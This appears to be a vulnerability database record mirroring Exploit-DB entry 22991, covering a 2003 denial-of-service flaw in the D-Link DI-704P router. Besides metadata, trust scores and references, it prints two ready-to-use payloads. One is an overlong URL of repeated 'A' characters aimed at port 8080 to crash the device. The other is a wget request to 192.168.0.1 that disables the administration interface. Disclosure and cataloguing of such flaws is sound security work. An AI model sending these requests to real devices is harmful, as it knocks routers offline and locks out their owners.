ID

VAR-E-200308-0072


EDB ID

22991


TITLE

D-Link DI-704P - Long URL Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22991

DESCRIPTION

D-Link DI-704P - Long URL Denial of Service.. dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 22991

AFFECTED PRODUCTS

vendor:d linkmodel:di-704pscope: - version: -

Trust: 1.3

sources: BID: 8355 // EXPLOIT-DB: 22991

EXPLOIT

source: https://www.securityfocus.com/bid/8355/info

D-Link DI-704P has been reported prone to a remote denial of service vulnerability.

The issue presents itself when a request of excessive length is sent to the router. This causes the device to behave in an unstable manner.

Malicious requests may result in a complete denial of service condition requiring a device reboot, or the loss of the ability to log in to the administration interface.

Although unconfirmed, it should be noted that other D-Link devices that use related firmware might also be affected.

To disable the device entirely:

http://68.x.x.x:8080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA

To prevent administration of the device from functioning:

wget
http://192.168.0.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA

Trust: 1.0

sources: EXPLOIT-DB: 22991

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 22991

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22991

TYPE

Long URL Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 22991

CREDITS

chris@cr-secure.net

Trust: 0.6

sources: EXPLOIT-DB: 22991

EXTERNAL IDS

db:BIDid:8355

Trust: 1.9

db:EXPLOIT-DBid:22991

Trust: 1.6

db:EDBNETid:45155

Trust: 0.6

sources: BID: 8355 // EXPLOIT-DB: 22991 // EDBNET: 45155

REFERENCES

url:https://www.securityfocus.com/bid/8355/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/22991/

Trust: 0.6

url:http://www.dlink.com/products/broadband/di704p/

Trust: 0.3

sources: BID: 8355 // EXPLOIT-DB: 22991 // EDBNET: 45155

SOURCES

db:BIDid:8355
db:EXPLOIT-DBid:22991
db:EDBNETid:45155

LAST UPDATE DATE

2022-07-27T09:53:29.940000+00:00


SOURCES UPDATE DATE

db:BIDid:8355date:2003-08-06T00:00:00

SOURCES RELEASE DATE

db:BIDid:8355date:2003-08-06T00:00:00
db:EXPLOIT-DBid:22991date:2003-08-06T00:00:00
db:EDBNETid:45155date:2003-08-06T00:00:00